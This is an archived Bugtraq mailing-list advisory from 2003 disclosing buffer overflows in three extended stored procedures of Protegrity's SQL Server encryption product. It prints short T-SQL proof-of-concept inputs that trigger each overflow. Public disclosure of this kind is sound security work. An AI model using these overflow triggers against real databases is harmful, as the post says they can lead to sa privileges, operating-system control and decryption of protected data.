Home page logo

bugtraq logo Bugtraq mailing list archives

Protegrity buffer overflow
From: sss sss <protegritysecvuln () yahoo com>
Date: Thu, 13 Mar 2003 10:42:01 -0800 (PST)

Additional details can be found at 

There is a company that does encryption of databases
called Protegrty. They use extended stored procedures
to do the encryption and decryption. I tested 3 of the
extended stored procedures and found all 3 vulnerable
to buffer overflows.

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',1926))
execute master.dbo.xp_pty_checkusers 'as', @test

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',850))
execute master.dbo.xp_pty_insert @test, @test, @test

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',850))
execute master.dbo.xp_pty_select @test, @test, @test

These security holes are fully exploitable and would
allow an attacker to perform any of the following:

1)become sa on the box
2)gain control of the operating system
3)decrypt the sensitive data Protegrity is encrypting

If you have this software, contact the vendor for the

Do you Yahoo!?
Yahoo! Web Hosting - establish your business online

  By Date           By Thread  

Current thread:
  • Protegrity buffer overflow sss sss (Mar 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]